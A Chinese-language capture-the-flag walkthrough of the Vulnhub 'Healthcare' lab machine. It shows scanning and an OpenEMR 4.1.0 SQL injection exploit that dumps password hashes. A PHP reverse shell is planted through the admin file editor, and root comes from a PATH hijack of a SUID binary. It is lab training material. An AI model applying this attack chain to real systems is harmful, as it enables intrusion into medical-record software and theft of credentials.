Vulnhub之Healthcare靶机详细测试过程

Healthcare

作者: jason huawen
靶机信息

名称：
地址：
识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
4.                                                                                                                              
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
10. 192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:f6:d1:32      1      60  PCS Systemtechnik GmbH            

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
4. Nmap scan report for inplainsight (192.168.56.254)
5. Host is up (0.000090s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 21/tcp open  ftp     ProFTPD 1.3.3d
9. 80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
10. | http-robots.txt: 8 disallowed entries
11. | /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
12. |_/all_our_e-mail_addresses /admin/ /
13. |_http-title: Coming Soon 2
14. |_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
15. MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
16. Service Info: OS: Unix
18. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19. Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

复制代码

NMAP扫描结果表明目标主机有2个开放端口：21（ftp)、80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ ftp 192.168.56.254
3. Connected to 192.168.56.254.
4. 220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
5. Name (192.168.56.254:kali): anonymous
6. 331 Password required for anonymous
7. Password:
8. 530 Login incorrect.
9. ftp: Login failed
10. ftp> quit
11. 221 Goodbye.
12.                                                                                                                               
13. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
14. └─$ searchsploit ProFTPD                                       
15. -----------------------------------------------------------------

复制代码

• FTP不允许匿名访问
  
• FTP服务为ProFTPD，可能存在mod_copy漏洞
  

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ curl http://192.168.56.254/robots.txt
3. # $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
4. # $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
5. # exclude help system from robots
6. User-agent: *
7. Disallow: /manual/
8. Disallow: /manual-2.2/
9. Disallow: /addon-modules/
10. Disallow: /doc/
11. Disallow: /images/
12. # the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
13. Disallow: /all_our_e-mail_addresses
14. # same idea here...
15. Disallow: /admin/
16. # but allow htdig to index our doc-tree
17. #User-agent: htdig
18. #Disallow:
19. # disallow stress test
20. user-agent: stress-agent
21. Disallow: /

复制代码

robots.txt存在/admin/条目，但是访问该目录，却返回页面不存在的错误。

1. ──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ nikto -h http://192.168.56.254      
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-04-21 22:08:13 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
11. + Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 01:21:38 2018
12. + The anti-clickjacking X-Frame-Options header is not present.
13. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
14. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
15. + "robots.txt" contains 8 entries which should be manually viewed.
16. + Uncommon header 'tcn' found, with contents: list
17. + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
18. + Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
19. + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
20. + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
21. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
22. + OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
23. + OSVDB-3233: /icons/README: Apache default file found.
24. + 9543 requests: 0 error(s) and 13 item(s) reported on remote host
25. + End Time:           2023-04-21 22:09:10 (GMT-4) (57 seconds)
26. ---------------------------------------------------------------------------

复制代码

nikto扫描结果认为存在shellcode漏洞，查询得到漏洞利用代码：

1. https://www.exploit-db.com/exploits/34900

复制代码

但是该代码并不能正常工作，只能另外寻找突破口。
接下来扫描一下目录：

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              js,html,txt,sh,php
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /images               (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
19. /index.html           (Status: 200) [Size: 5031]
20. /index                (Status: 200) [Size: 5031]
21. /.html                (Status: 403) [Size: 1000]
22. /css                  (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
23. /js                   (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
24. /vendor               (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
25. /favicon              (Status: 200) [Size: 1406]
26. /robots               (Status: 200) [Size: 620]
27. /robots.txt           (Status: 200) [Size: 620]
28. /fonts                (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
29. /gitweb               (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
30. /.html                (Status: 403) [Size: 1000]
31. /phpMyAdmin           (Status: 403) [Size: 59]
32. /server-status        (Status: 403) [Size: 1000]
33. /server-info          (Status: 403) [Size: 1000]
34. /openemr              (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]

复制代码

扫描出/openemr目录，其他目录没有什么价值。
访问该目录，可知CMS为OpenEMR, 版本为4.1.0，查询是否存在相关漏洞

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ searchsploit openEMR 4.1.0
3. -------------------------------------------------------------------------------------------- ---------------------------------
4. Exploit Title                                                                              |  Path
5. -------------------------------------------------------------------------------------------- ---------------------------------
6. OpenEMR 4.1.0 - 'u' SQL Injection                                                           | php/webapps/49742.py
7. Openemr-4.1.0 - SQL Injection                                                               | php/webapps/17998.txt
8. -------------------------------------------------------------------------------------------- ---------------------------------
9. Shellcodes: No Results
10.                                                                                                                               
11. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
12. └─$ searchsploit -m php/webapps/49742.py
13.   Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
14.       URL: https://www.exploit-db.com/exploits/49742
15.      Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
16.     Codes: N/A
17. Verified: False
18. File Type: Python script, ASCII text executable
19. Copied to: /home/kali/Vulnhub/Healthcare/49742.py

复制代码

将漏洞利用代码拷贝至工作目录，执行该代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ python 49742.py                                                                     
4.    ____                   ________  _______     __ __   ___ ____
5.   / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
6. / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
7. / /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
8. \____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
9.     /_/
10.     ____  ___           __   _____ ____    __    _
11.    / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
12.   / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
13. / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
14. /_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike
16. [+] Finding number of users...
17. [+] Found number of users: 2
18. [+] Extracting username and password hash...
19. admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
20. medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d   

复制代码

利用在线网站解密：

1. https://md5decrypt.net/en/Sha1/#answer

复制代码

得到admin的密码为ackbar, 另外一个用户密码为medical
登录:

1. http://192.168.56.254/openemr/

复制代码

在administration栏目中，可以Edit file，看是否可以将shell.php代码增加到其中一个文件，比如：statement.inc.php,而且可以看到完整的路径，将shell.php代码拷贝增加到statement.inc.php后，访问该文件：

1. http://192.168.56.254/openemr/sites/default/statement.inc.php

复制代码

从而在Kali Linux上得到reverse shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]
2. └─$ sudo nc -nlvp 5555                  
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
6. Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
7. 20:50:43 up  1:55,  0 users,  load average: 1.00, 1.28, 3.57
8. USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=479(apache) gid=416(apache) groups=416(apache)
10. sh: no job control in this shell
11. sh-4.1$ which python
12. which python
13. /usr/bin/python
14. sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
15. python -c 'import pty;pty.spawn("/bin/bash")'
16. bash-4.1$ cd /home
17. cd /home
18. bash-4.1$ ls -alh
19. ls -alh
20. total 20K
21. drwxr-xr-x  5 root     root     4.0K Jul 29  2020 .
22. drwxr-xr-x 21 root     root     4.0K Apr 21 18:54 ..
23. drwxr-xr-x 27 almirant almirant 4.0K Jul 29  2020 almirant
24. drwxr-xr-x 31 medical  medical  4.0K Nov  5  2011 medical
25. drwxr-xr-x  3 root     root     4.0K Nov  4  2011 mysql

复制代码

1. bash-4.1$ cat user.txt
2. cat user.txt
3. d41d8cd98f00b204e9800998ecf8427e

复制代码

从而得到了user flag
提权

看能否用前面得到的密码切换shell到medical

1. bash-4.1$ su - medical
2. su - medical
3. Password: medical
5. [medical@localhost ~]$ id
6. id
7. uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

复制代码

我们的猜测是正确的

1. [medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null

复制代码

/usr/bin/healthcheck有SUID位

1. [medical@localhost backups]$ strings /usr/bin/healthcheck
2. strings /usr/bin/healthcheck
3. /lib/ld-linux.so.2
4. __gmon_start__
5. libc.so.6
6. _IO_stdin_used
7. setuid
8. system
9. setgid
10. __libc_start_main
11. GLIBC_2.0
12. PTRhp
13. [^_]
14. clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

复制代码

可以看到healthcheck会执行ifconfig,因此可以生成我们的ifconfig命令，从而实现提权

1. cd /tmp
2. [medical@localhost tmp]$ echo '/bin/bash' > ifconfig
3. echo '/bin/bash' > ifconfig
4. [medical@localhost tmp]$ chmod 777 ifconfig
5. chmod 777 ifconfig
6. [medical@localhost tmp]$ export PATH=/tmp:$PATH
7. export PATH=/tmp:$PATH
8. [medical@localhost tmp]$ /usr/bin/healthcheck
9. /usr/bin/healthcheck
10. TERM environment variable not set.
11. System Health Check
13. Scanning System
14. [root@localhost tmp]# cd /root
15. cd /root
16. [root@localhost root]# ls -alh
17. ls -alh
18. total 920K
19. drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
20. drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
21. -rw-------  1 root root  426 Jul 29  2020 .bash_history
22. -rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
23. -rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
24. drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
25. drwx------  6 root root 4.0K Sep 12  2011 .config/
26. drwx------  3 root root 4.0K Jul 19  2011 .dbus/
27. drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
28. -rw-------  1 root root   28 Jul 22  2011 .dmrc
29. drwx------  3 root root 4.0K Sep  8  2011 Documents/
30. drwx------  2 root root 4.0K Sep  6  2011 drakx/
31. drwx------  4 root root 4.0K Sep 24  2011 .gconf/
32. drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
33. drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
34. drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
35. drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
36. drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
37. -rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
38. -rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
39. -rw-------  1 root root    0 Sep 11  2011 .ICEauthority
40. drwx------  3 root root 4.0K Sep  6  2011 .local/
41. drwx------  3 root root 4.0K Nov  5  2011 .mc/
42. -rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
43. -rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
44. -rw-------  1 root root    6 Jul 29  2020 .mysql_history
45. -rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
46. -rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
47. drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
48. drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
49. drwx------  2 root root 4.0K Apr 21 18:54 tmp/
50. drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
51. -rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
52. [root@localhost root]# cat root.txt
53. cat root.txt
54. ██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██ 
55.  ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
56.  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██ 
57.    ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██    
58.    ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██ 
59.                                                                                                                           
60.                                                                                                                           
61. Thanks for Playing!
63. Follow me at: http://v1n1v131r4.com
66. root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
68. [root@localhost root]#

复制代码

至此成功得到了root shell和root flag.
经验教训

• 在nikto结果得知目标可能存在shellshock后，就认定可以利用漏洞，而忽略对于web应用的正常步骤，即扫描目录，而且需要足够的耐心才能得到相应的目录，否则该靶机将无解。
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！